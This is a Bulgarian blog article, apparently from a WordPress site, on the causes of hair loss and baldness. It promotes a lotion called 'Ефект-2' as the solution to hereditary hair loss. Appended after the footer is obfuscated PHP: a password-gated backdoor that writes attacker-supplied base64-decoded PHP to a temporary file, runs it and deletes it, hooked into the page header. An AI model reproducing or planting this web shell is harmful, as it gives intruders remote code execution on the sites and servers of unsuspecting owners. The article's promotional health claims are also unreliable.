Кои фактори водят до косопад и оплешивяване | Косопад

Кои фактори водят до косопад и оплешивяване

Косопадът е голям проблем за мъжете, тъй като се притесняват да не станат плешиви. Жените също тежко изживяват загубата на косата. Нека разгледаме кои са причините за този сериозен проблем.

kosopad-pri-muje

Алопецията или косопадът засягат 60% от мъжкото население по света. Наследствеността е сред най- силните фактори за появата на проблема. Мъжете, които имат плешиви роднини, са по- изложение на риск от загуба на косата, дори често на ранна възраст. Този тип алопеция се нарича андрогенетична или наследствена и се възприема като хормонално разстройство.

Много често обаче процесът може да бъде спрян, ако се хване в началото. Но повечето мъже се примиряват и си казват: „Няма какво да направя, щом дядо ми е плешив, и аз ще оплешивея“. Докато корените са още живи, има начин да им се въздейства, за да се върнат към нормалните си функции – решението е лосионът „Ефект- 2“.

Има и много други причинители на косопада, освен наследствеността: липса на определениkosopad-predpazvane витамини или минерали, анемия, дерматологични заболявания, имунни заболявания, проблеми с щитовидната жлеза, но най- вече влияе стреса. Смяната на сезоните също предизвиква силен косопад.

След като косата окапе, коренът остава жив още няколко години, през които ако се стимулира правилно, може да поникне отново коса. Доказателството, че коренът е жив, са малки косъмчета или мъхчета, които има по олисялото място.

Нормалното е дневно за губим средно между 80 и 120 косъма. Ако космените фоликули функционират както трябва, на мястото на падналия косъм веднага започва да расте нов.

Топлината също е един от най- големите врагове на косата. Затова трябва да избягваме силно слънце, уреди като сешоар и преса. Носете шапки, но трябва да следите дали кожата ви диша през тях.

26. март 2014 16:05:04 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}